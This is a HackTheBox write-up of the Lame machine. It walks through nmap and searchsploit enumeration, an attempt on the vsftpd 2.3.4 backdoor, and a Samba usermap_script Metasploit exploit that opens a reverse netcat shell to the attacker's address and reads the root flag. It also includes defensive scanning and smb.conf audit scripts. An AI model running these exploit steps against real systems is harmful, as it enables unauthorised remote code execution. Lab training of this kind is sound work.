Lame HackTheBox Walkthrough

In this writeup I demonstrate, in simple language, how I rooted the Lame HackTheBox machine. Before starting, a few facts about the machine: it is a Linux box rated low difficulty by its maker and has the IP address 10.10.10.3. The machine is retired, so a VIP subscription at HackTheBox is required to access it.

First, connect your PC to the HackTheBox VPN and confirm connectivity by pinging 10.10.10.3. If the ping gets no reply after connecting to the VPN, make sure the machine is running in the lab; start it if it is not, then ping again. Once the box responds, start the initial enumeration.

I started the enumeration by scanning the box for open ports with nmap. We scan the machine to get details of the services running on it and then dig deeper into each service; this gives a rough idea of how to proceed with further enumeration. Nmap (a well-known port scanner) gave the following results.

Scanning

$ nmap -sC -sV -oN lame_scan 10.10.10.3

[Screenshot: nmap default-script scan report for the Lame machine]

The nmap scan revealed that ports 21, 22, 139 and 445 are open: FTP on port 21, SSH on 22 and Samba on 139 and 445. With open ports and services identified, the next step is to enumerate each service in more depth with a tool dedicated to it: for example, the ftp client for vsftpd, and smbmap, smbclient, enum4linux and similar tools for the SMB service.

vsftpd 2.3.4 is running on port 21. Whenever I find a service with a version number, my first step is to search for known public exploits affecting that version. These can be searched on exploit-db, PacketStormSecurity and GitHub [if we have internet access during the penetration test]; without internet access, the searchsploit command queries the exploit database bundled with Kali Linux. So let us check whether a public exploit exists for vsftpd 2.3.4. searchsploit found one in Kali's local exploit-database.
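The same version-matching step can be done from the defender's side: a service owner who runs the scan above against their own hosts wants the banners triaged against an inventory of versions known to be bad. The script below is an added example for this walkthrough, not the author's tooling; the nmap -oN text and the KNOWN_BAD inventory are constructed inline (the SSH banner is a placeholder), and the inventory only contains the two versions this page identifies, vsftpd 2.3.4 and Samba 3.0.20.

```python
"""Triage an nmap -oN service scan against a list of versions known to be
vulnerable, from an asset owner's point of view. Added example for this
walkthrough, not the author's tooling; the scan text and the inventory of
bad versions below are constructed for the demonstration."""
import re

# Constructed sample in nmap's normal (-oN) output format, mirroring the ports
# the walkthrough's scan found. The SSH line is a placeholder, not a real banner.
SAMPLE_SCAN = """\
# Nmap scan initiated as: nmap -sC -sV -oN lame_scan 10.10.10.3
Nmap scan report for 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH (placeholder banner)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Versions the walkthrough identifies as exploitable, with the defender's action.
KNOWN_BAD = {
    "vsftpd": {"2.3.4": "backdoored release: rebuild from a verified clean source or upgrade"},
    "samba": {"3.0.20": "'username map script' command execution: upgrade Samba and drop the directive"},
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
VERSION_TOKEN = re.compile(r"\b(\d+(?:\.\d+)+)")  # dotted numeric version, e.g. 3.0.20


def parse_scan(text):
    """Return one dict per port line; NSE script output (lines starting with
    | or |_) is attached to the service that precedes it."""
    services = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            services.append({"port": int(port), "proto": proto, "state": state,
                             "service": service, "version": version.strip(),
                             "scripts": []})
        elif line.startswith("|") and services:
            services[-1]["scripts"].append(line.lstrip("|_ "))
    return services


def triage(text):
    """Match each open service's version against KNOWN_BAD and flag
    anonymous FTP reported by nmap's ftp-anon script."""
    findings = []
    for svc in parse_scan(text):
        if svc["state"] != "open":
            continue
        banner = svc["version"]
        ver = VERSION_TOKEN.search(banner)
        for product, bad_versions in KNOWN_BAD.items():
            # nmap may print a range like "3.X - 4.X"; that yields no exact
            # version, so the port is skipped rather than guessed at.
            if product in banner.lower() and ver and ver.group(1) in bad_versions:
                findings.append({"port": svc["port"], "product": product,
                                 "version": ver.group(1),
                                 "action": bad_versions[ver.group(1)]})
        for script in svc["scripts"]:
            if script.startswith("ftp-anon:") and "login allowed" in script:
                findings.append({"port": svc["port"], "product": "ftp", "version": None,
                                 "action": "anonymous login enabled: disable it unless the share is meant to be public"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_SCAN):
        print(f"port {f['port']}: {f['product']} {f['version'] or ''} -> {f['action']}")
```

Run against the constructed scan it reports three items: vsftpd 2.3.4 on 21, anonymous FTP on 21, and Samba 3.0.20 on 445; the 139/tcp line carries only a version range and is deliberately not matched.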

$ searchsploit vsftpd 2.3.4 # Search the exploit-database bundled with Kali for this version

[Screenshot: searching for a vsftpd exploit with searchsploit]

According to the result, vsftpd 2.3.4 contains a backdoor, which may have been planted in the source code by an intruder before the release was built, and which can be used to execute commands on the host where the vsftpd service is running. A Metasploit module for this backdoor command execution is also present in the local exploit DB.

$ msfdb run # Start the Metasploit Framework together with its database

msf5 > search vsftpd

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[Screenshot: running the vsftpd exploit against the Lame machine]

Using exploit/unix/ftp/vsftpd_234_backdoor we could not get a shell. Possibly a firewall is blocking the exploit, or the admin has restricted it on port 21. I left it there and moved on with further enumeration. During enumeration we also noticed that nmap's default script ftp-anon reported that anonymous login is allowed on port 21, so I tried logging in anonymously with the credentials anonymous : anonymous. The login succeeded, but listing the directory showed that the home directory is empty. I looked for sensitive files, data, usernames and so on, but nothing was present.

$ ftp 10.10.10.3

Name: anonymous

Password: anonymous

[Screenshot: anonymous FTP login and information gathering on Lame]

Having found nothing interesting on port 21, I moved on to the services running on the other ports. Samba 3.0.20 [the open-source SMB/CIFS server for Linux] is running on ports 139 and 445. So, as usual, my next step was to search for public exploits against Samba 3.0.20.

$ searchsploit samba 3.0.20

[Screenshot: searching for Samba exploits with searchsploit]

According to the searchsploit result, Samba 3.0.20 is vulnerable to 'username map script' command execution, which lets an attacker run commands on the server where Samba 3.0.20 is running. A Metasploit module named usermap_script is also available. Using this exploit, I got a remote shell successfully.
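From the defender's side, the fix for this issue is to upgrade smbd and to drop the 'username map script' directive from smb.conf, and both conditions are easy to check automatically. The script below is an added example for this walkthrough, not code from the author or from the Samba project. Both smb.conf fragments are constructed (the script path in the vulnerable one is a placeholder), the parser normalises parameter names the way Samba does (case-insensitive, whitespace ignored), and Samba 3.0.25 is used as the first 3.0.x release carrying the fix for this issue.

```python
"""Audit a Samba configuration for the 'username map script' directive that
the usermap_script exploit abuses, and for an affected smbd version.
Added example for this walkthrough, not code from the author or from the
Samba project; both config fragments below are constructed."""
import re

# Constructed smb.conf fragment with the risky directive (not from the Lame box;
# the script path is a placeholder).
VULNERABLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba)
   Username Map Script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   read only = no
"""

# Constructed hardened counterpart: the directive is simply absent.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user

[tmp]
   path = /tmp
   read only = yes
"""

# Samba 3.0.25 is the first 3.0.x release containing the fix for this issue.
FIXED_VERSION = (3, 0, 25)


def parse_smb_conf(text):
    """Minimal smb.conf parser: [section] headers, 'key = value' lines, and
    comments starting with # or ;. Samba compares parameter names
    case-insensitively and ignores whitespace inside them, so keys are
    normalised the same way ('Username Map Script' -> 'usernamemapscript')."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def version_tuple(version):
    """'3.0.20-Debian' -> (3, 0, 20); packaging suffixes are ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", version)[:3])


def audit(conf_text, smbd_version=None):
    """Return a list of findings; an empty list means nothing to fix here."""
    findings = []
    for section, params in parse_smb_conf(conf_text).items():
        if "usernamemapscript" in params:
            findings.append(f"[{section}] sets 'username map script' = "
                            f"{params['usernamemapscript']}: remove it and upgrade smbd")
    if smbd_version is not None and version_tuple(smbd_version) < FIXED_VERSION:
        fixed = ".".join(map(str, FIXED_VERSION))
        findings.append(f"smbd {smbd_version} predates {fixed}: upgrade")
    return findings


if __name__ == "__main__":
    print("vulnerable:", audit(VULNERABLE_SMB_CONF, "3.0.20-Debian"))
    print("hardened:  ", audit(HARDENED_SMB_CONF, "3.6.0") or ["ok"])
```

On a live host the version string would come from `smbd --version` (or the banner nmap reported, as on this box) and the config text from the server's smb.conf; the audit reports two findings for the vulnerable fragment on 3.0.20 and none for the hardened one on a fixed release.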

msf5 > search usermap_script

msf5 > use exploit/multi/samba/usermap_script

msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse_netcat

msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3

msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.5

msf5 exploit(multi/samba/usermap_script) > exploit

[Screenshot: exploiting the Samba service to get a shell on Lame]

We got a shell. However, it is not a proper shell prompt or a fully featured Linux shell, so I upgraded it using python.

Upgrading the Shell

$ which python # To check whether python is installed on remote machine

$ shell # To get a shell prompt

[Screenshot: upgrading to a fully featured Linux shell]

We have upgraded the shell. Now it is time to capture the flag.

Note: we are already root after getting the shell, which means we have full permission to do anything. Since the shell is a root shell, no privilege escalation is required.

Capture User Flag

$ cat /home/makis/user.txt

[Screenshot: Lame user flag captured]

Capture Root Flag

$ cat /root/root.txt

[Screenshot: Lame root flag captured]

This was how I rooted the Lame HackTheBox machine. It was an easy box. I hope you liked my methodology and learnt something new. Share your experience by commenting in the comment section below. For any help or suggestions related to the walkthrough, feel free to write to us at [email protected].

If you liked this walkthrough, check out our active machine writeups at https://ethicalhacs.com/. The next upcoming walkthrough is Legacy.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/